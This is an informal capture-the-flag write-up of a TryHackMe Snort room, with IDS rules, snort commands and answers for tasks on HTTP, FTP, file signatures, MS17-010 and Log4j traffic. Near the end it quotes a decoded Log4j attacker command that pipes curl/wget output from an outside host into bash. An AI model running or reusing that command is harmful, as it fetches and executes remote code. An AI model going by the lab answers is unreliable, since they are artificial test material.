Snort Write -Up THM

AS Using Linux terminal there are more way to achieve the same goal.?

Important notes dump:

sudo snort -c /etc/snort/snort.conf -A full -l . -r mx-1.pcap

reading packet sniffer

sudo snort -dev -K ASCII

content:"|47 45 54|"

/etc/snort/rules/local.rules

opening the log file with TCPdump

sudo tcpdump -r snort.log.1638459842 -ntc 10

#####################

WRITE-UP Task 2

Go to the folder of the task

cd Desktop/Exercise-Files/TASK-2\ \(HTTP)/

Once inside the folder apply the local rule as requested:

sudo gedit /home/ubuntu/Desktop/Exercise-Files/TASK-2\ \(HTTP)/local.rules

HTTP Rules

alert tcp any 80 <> any any (msg: "HTTP FOUND"; sid: 100001; rev: 1;)

alert tcp any any <> any 80 (msg: "HTTP FOUND"; sid: 100002; rev: 1;)

Let s apply this rule to the pcap given:

sudo snort -c /home/ubuntu/Desktop/Exercise-Files/TASK-2\ \(HTTP)/local.rules -A full -l . -r mx-1.pcap

Total packets:

number 328

now let s get the packet needed.

use sudo snort -r #logfilename -n #number of packet

sudo snort -r snort.log.16700022 -n 63

dst IP:?145.254.160.237

sudo snort -r?snort.log.16700022 -n 64

ACK:?0X38AFFFF3

sudo snort -r snort.log.16700022 -n 62

SEQ: 0X38AFFFF3

sudo snort -r snort.log.16700022 -n 65

TTL: 128

Src IP: 145.254.160.237

Src Port: 3372

etc..

Task 3:

Desktop/Exercise-Files/TASK-3 (FTP)

adding your own rule:

gedit local.rules

Rules:

FTP

alert tcp any 21 <> any any (msg: "HTTP FOUND"; sid: 100001; rev: 1;)

alert tcp any any <> any 21 (msg: "HTTP FOUND"; sid: 100002; rev: 1;)

sudo snort -c /home/ubuntu/Desktop/Exercise-Files/TASK-3\ \(FTP)/local.rules -A full -l . -r ftp-png-gif.pcap

Total packets: 614

we can analyze the pcap file.

sudo snort -r snort.log.1565 -d "tcp and port 21" -n 10

FTP service name: Microsoft FTP Service

Failed login attempts

alert tcp any any <> any 21 (msg: "Failed FTP Login"; content:"530 User"; sid: 100003; rev: 1;)

Hint: Each failed FTP login attempt prompts a default message with the pattern; "530 User". Try to filter the given pattern in the inbound FTP traffic

Ans: 41

Write a rule to detect successful FTP logins in the given pcap.

alert tcp any any <> any 21 (msg: "Sucessful FTP Login"; content:"230 User"; sid: 100004; rev: 1;)

Ans:1

Write a rule to detect failed FTP login attempts with a valid username but a bad password or no password.

Useful resource: https://hstechdocs.helpsystems.com/manuals/globalscape/cuteftpmacpro3/Numbered_FTP_status_and_error_codes.htm

Hint: Each FTP login attempt with a valid username and bad password prompts a default message with the pattern; "331 Password". Try to filter the given pattern in the FTP traffic. Try to filter the given username.

alert tcp any any <> any 21 (msg: "Failed FTP/Good_Usr/BadPass"; content:"331 Password"; sid: 100004; rev: 1;)

Ans:42

Write a rule to detect failed FTP login attempts with "Administrator" username but a bad password or no password.

Hint: You can use the "content" filter more than one time.

alert tcp any any <> any 21 (msg: "Failed Admin Login Attempt"; content:"Administrator"; content:"331 Password"; sid: 100005; rev: 1;)

Ans: 7

sudo snort -c local.rules -dev -l . -r ftp-png......

Task 4

Write a rule to detect the PNG file in the given pcap.

reference:image magic number Wikipedia

Please if you use wikipedia offer a coffe a year for the service :)

It is an open source but in this world nothing is for free.

Include the numbers into pipe ||; pipe tell snort thet there is binary data in it

alert tcp any any <> any any (msg: "PNG FOUND"; content: "|89 50 4E 47 0D 0A 1A 0A|"; sid: 1000001; rev:01;)

sudo snort -r snort.log.16... -A cmg

Ans: Adobe ImageRead

Write a rule to detect the GIF file in the given pcap.

reference:same as the above

47 49 46 38 37 61

or

GIF87a

GIF89a

alert tcp any any <> any any (msg: "GIF FOUND"; content: "|47 49 46 38 37 61|"; sid: 1000001; rev:01;)

alert tcp any any <> any any (msg: "GIF FOUND"; content: "|GIF87a|"; sid: 1000001; rev:01;)

alert tcp any any <> any any (msg:"GIF FOUND"; content:"GIF89a"; sid:1000001; rev:01;)

sudo snort -d -r snort.log.1515

ANS:GIF89a

Task 5

Write a rule to detect the torrent metafile in the given pcap.

Personally the content string

alert tcp any any <> any any (msg:"TORRENT FOUND"; content:"torrent"; sid:1000001; rev:01;)

sudo snort -c local.rules -A full -l . -r torrent.....

Ans:2

What is the name of the torrent application?

xbittorrent

What is the MIME (Multipurpose Internet Mail Extensions) type of the torrent metafile?

application/x-bittorrent

What is the hostname of the torrent metafile?

tracker2.torrentbox.com

Task 6

You can test each ruleset with the following command structure;

sudo snort -c local-X.rules -r mx-1.pcap -A console

Fix the syntax error in local-1.rules file and make it work smoothly.

What is the number of the detected packets?

(Add a space after any)

16

Fix the syntax error in local-2.rules file and make it work smoothly.

Add 'any' for the port number.

What is the number of the detected packets?

68

Fix the syntax error in local-3.rules file and make it work smoothly.

Check the sid number....

What is the number of the detected packets?

87

Fix the syntax error in local-4.rules file and make it work smoothly.

Sid number and semicolons instaed of a double columns

What is the number of the detected packets?

90

Fix the syntax error in local-5.rules file and make it work smoothly.

Columns and ->

What is the number of the detected packets?

155

Fix the logical error in local-6.rules file and make it work smoothly to create alerts.

67 65 74 = get

add 'nocase after the first content'

What is the number of the detected packets?

2

Fix the logical error in local-7.rules file and make it work smoothly to create alerts.

2E 68 74 6D 6C = html

Missing the message

What is the name of the required option:

MSG

Task7

Use the given rule file (local.rules) to investigate the ms1710 exploitation.

sudo snort -c local.rules -r ms17....??-A console

What is the number of detected packets?

25154

Clear the previous log and alarm files.

Use local-1.rules empty file to write a new rule to detect payloads containing the "\IPC$" keyword.

alert tcp any any <> any any (mgs:"IPC FOUND"; content:"IPC$";nocase;sid:1000001;rev:1;)

or avoid the escape carachter by using '\\'.

What is the number of detected packets?

12

What is the requested path?

read the log and look on the hex output

\\192.168.116.138\IPC$

What is the CVSS v2 score of the MS17-010 vulnerability?

Check the NIST database

9.3

Task 8

Use the given rule file (local.rules) to investigate the log4j exploitation.

What is the number of detected packets?

26

How many rules were triggered?.

The hint recommend to use the cli; thus read the alert and find something in coomn to be able to view it.

cat alert | grep "210037*"

4

What are the first six digits of the triggered rule sids?

210037

Use local-1.rules empty file to write a new rule to detect packet payloads between 770 and 855 bytes.

alert tcp any any <> any any (msg:"BYTES FOUND"; dsize:770<>855; sid:1000001; rev:1;)

What is the number of detected packets?

41

What is the name of the used encoding algorithm?

Base64

What is the IP ID of the corresponding packet?

62808

What is the attacker's command?

KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNjIuMC4yMjguMjUzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE2Mi4wLjIyOC4yNTM6ODApfGJhc2g=

USE Cyberchef

(curl -s 45.155.205.233:5874/162.0.228.253:80||wget -q -O- 45.155.205.233:5874/162.0.228.253:80)|bash

What is the CVSS v2 score of the Log4j vulnerability?

9.3

Nice one!!!